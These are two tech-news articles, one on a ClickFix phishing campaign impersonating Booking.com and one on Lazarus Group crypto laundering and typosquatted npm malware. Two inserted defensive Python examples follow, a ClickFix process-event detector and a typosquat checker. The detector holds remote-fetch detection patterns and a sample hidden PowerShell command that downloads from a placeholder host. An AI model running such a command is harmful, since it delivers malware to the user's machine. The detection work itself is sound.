
Cybercriminals Impersonate Booking.com In New Phishing Attack

  • Written by Kiara Fabbri, Former Tech News Writer
  • Fact-Checked by Sarah Frazier, Former Content Manager

Microsoft has identified an ongoing phishing campaign targeting hotel and hostel staff by impersonating the travel agency Booking.com.

In a Rush? Here are the Quick Facts!

  • Microsoft warns of a phishing campaign targeting hotel staff via fake Booking.com emails.
  • Hackers use a “ClickFix” method to bypass security filters and avoid detection.
  • Booking.com confirms no security breach but warns partners about ongoing phishing scams.

Microsoft’s security team identified the campaign in December 2024, just before the busy holiday travel season. The scam is still active as of February 2025, affecting organizations across North America, Europe, Oceania, and parts of Asia.

The attackers send fake emails that appear to be from Booking.com, referencing negative guest reviews, urgent booking requests, or account verification needs. These emails contain links leading to a deceptive webpage designed to resemble Booking.com.

On this fake website, victims are prompted to complete a CAPTCHA verification, but instead of a real security check, they are instructed to open a special command window on their computer and paste in a provided code. This action downloads and executes malware that can steal sensitive information.

The malware delivered in this attack includes several well-known hacking tools, such as XWorm, VenomRAT, and AsyncRAT.

These programs allow cybercriminals to take control of infected devices, capture passwords, and commit financial fraud. Microsoft has linked this activity to a hacker group it calls Storm-1865, which has previously targeted e-commerce platforms and hotel guests using similar tactics.

The addition of this new method, known as “ClickFix,” shows how attackers are evolving to bypass security defenses. By making the victim take specific actions, such as copying and pasting code, they can avoid automatic detection by email filters and antivirus software.
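The ClickFix pattern described above leaves a recognisable trace on the endpoint: a scripting interpreter started from the user's shell with a command line that reaches out to a URL. The following detection heuristic is an added example, not code from Microsoft's report or the article; the event shape, the interpreter list and the sample events are constructed simplifications, and the hostname is a placeholder.

```python
import re

# Interpreters commonly abused by paste-and-run lures (assumption, not from the article).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# The Run box and desktop are hosted by explorer.exe, so explorer -> interpreter is the parent chain to watch.
LAUNCHER_PARENTS = {"explorer.exe"}
# Indicators that the pasted text fetches remote content.
REMOTE_FETCH = re.compile(r"https?://|downloadstring|invoke-webrequest|\biwr\b|\birm\b", re.IGNORECASE)


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_clickfix_like(event):
    """True when an interpreter is launched from explorer.exe with a
    command line that references a URL or a remote-fetch cmdlet."""
    if basename(event["image"]) not in INTERPRETERS:
        return False
    if basename(event["parent_image"]) not in LAUNCHER_PARENTS:
        return False
    return bool(REMOTE_FETCH.search(event["command_line"]))


def triage(events):
    """Return the indices of events that match the heuristic."""
    return [i for i, ev in enumerate(events) if is_clickfix_like(ev)]


# Constructed sample process-creation events (simplified, not a vendor log format).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe notes.txt"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "Invoke-WebRequest http://placeholder.invalid/verify"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Admin\deploy.exe",
     "command_line": "powershell -File C:\\scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        print("suspicious:", SAMPLE_EVENTS[i]["command_line"])
```

Only the second event fires: the first is an ordinary explorer-launched program and the third is PowerShell started by a deployment tool, not by the user's shell.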

A Booking.com spokesperson clarified that the attack does not involve a security breach on their platform.

“While we can confirm that Booking.com’s systems have not been breached, we are aware that unfortunately some of our accommodation partners and customers have been impacted by phishing attacks sent by professional criminals, with the criminal intent of taking over their local computer systems with malware,” they said, as reported by The Record.

Microsoft advises businesses to enforce multi-factor authentication, use email filtering tools to scan for phishing attempts, and ensure staff are trained to recognize suspicious emails. With cybercriminals constantly refining their tactics, staying vigilant against phishing attacks is crucial, especially in industries that handle sensitive customer data.


Lazarus Group Linked To $750,000 Ethereum Laundering

  • Written by Kiara Fabbri, Former Tech News Writer
  • Fact-Checked by Sarah Frazier, Former Content Manager

In a Rush? Here are the Quick Facts!

  • Lazarus Group deposited 400 ETH ($750,000) into Tornado Cash on March 13.
  • The deposit connects to their previous Bitcoin network activities, indicating ongoing fund laundering.
  • Lazarus has stolen over $1.3 billion in crypto assets in 2024, double 2023’s total.

On March 13, blockchain security firm CertiK reported that the Lazarus Group deposited 400 Ethereum (ETH), worth around $750,000, into the Tornado Cash mixing service, a tool used to obscure the origin of crypto assets.

#CertiKInsight 🚨 We have detected a deposit of 400 ETH in https://t.co/0lwPdz0OWi on Ethereum from: 0xdB31a812261d599A3fAe74Ac44b1A2d4e5d00901 0xB23D61CeE73b455536EF8F8f8A5BadDf8D5af848. The fund traces to the Lazarus group’s activity on the Bitcoin network. Stay Vigilant! pic.twitter.com/IHwFwt5uQs — CertiK Alert (@CertiKAlert) March 13, 2025

This move was linked to their previous activity on the Bitcoin network, underscoring the group’s ongoing efforts to launder funds following high-profile hacks.

The Lazarus Group is notorious for its involvement in major cryptocurrency thefts, including the $1.4 billion hack of Bybit in February 2025 and the $29 million Phemex hack in January, as noted by CoinTelegraph.

According to blockchain analytics firm Chainalysis, Lazarus has stolen over $1.3 billion in crypto assets in 2024 alone, more than doubling their 2023 thefts.

Meanwhile, cybersecurity researchers at Socket have uncovered a new wave of malicious packages targeting the npm ecosystem, used by developers to manage JavaScript libraries.

The six malicious packages, downloaded over 330 times, were found to be embedded with a form of malware known as BeaverTail. These packages mimic legitimate libraries in a deceptive tactic called typosquatting, where slight variations in names are used to trick developers into installing harmful code.

Socket’s researchers observed that the tactics, techniques, and procedures in this npm attack closely align with Lazarus’s known operations. The packages were designed to steal sensitive information, including credentials and cryptocurrency data, while also deploying backdoors into affected systems.

Specifically, they targeted files in browsers like Chrome, Brave, and Firefox, and keychain data on macOS, focusing on developers who may not notice the malware during installation.

This attack highlights Lazarus’s continued use of sophisticated infiltration methods, leveraging trusted names in the npm registry to exploit the open-source community. Despite the obfuscation techniques used, researchers were able to detect the malicious intent and flagged the packages for removal.

As Lazarus continues its cybercriminal activities, experts warn that organizations must adopt stricter security measures, such as automated auditing of code and dependency scans, to prevent similar attacks.
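The typosquatting tactic described above and the dependency-scan recommendation can be combined into a simple manifest check: flag dependency names that are one edit (insertion, deletion, substitution or adjacent swap) away from a well-known package without being that package. This is an added example, not Socket's tooling or code from the article; the allowlist and the package.json content are constructed samples.

```python
import json

# Constructed allowlist; a real check would use a curated list of high-download names.
KNOWN_PACKAGES = {"lodash", "express", "react", "axios", "chalk", "commander"}


def edit_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute and
    adjacent transposition each cost 1 (swapped letters are common typosquats)."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def find_typosquats(manifest_text, known=KNOWN_PACKAGES, max_distance=1):
    """Return [(dependency, lookalike)] for names close to, but not equal to,
    a known package. Scoped names (@org/pkg) are compared on the bare part."""
    manifest = json.loads(manifest_text)
    deps = {}
    for section in ("dependencies", "devDependencies"):
        deps.update(manifest.get(section, {}))
    hits = []
    for name in deps:
        bare = name.split("/", 1)[1] if name.startswith("@") else name
        if bare in known:
            continue  # exact match with a known package is fine
        for good in known:
            if edit_distance(bare, good) <= max_distance:
                hits.append((name, good))
                break
    return hits


# Constructed manifest: one exact match, two lookalikes, one unrelated name.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "sample-app",
    "dependencies": {"express": "^4.19.0", "lodahs": "^4.17.21", "left-pad": "^1.3.0"},
    "devDependencies": {"chalkk": "^5.3.0"},
})

if __name__ == "__main__":
    for dep, lookalike in find_typosquats(SAMPLE_PACKAGE_JSON):
        print(f"{dep!r} resembles well-known package {lookalike!r}")
```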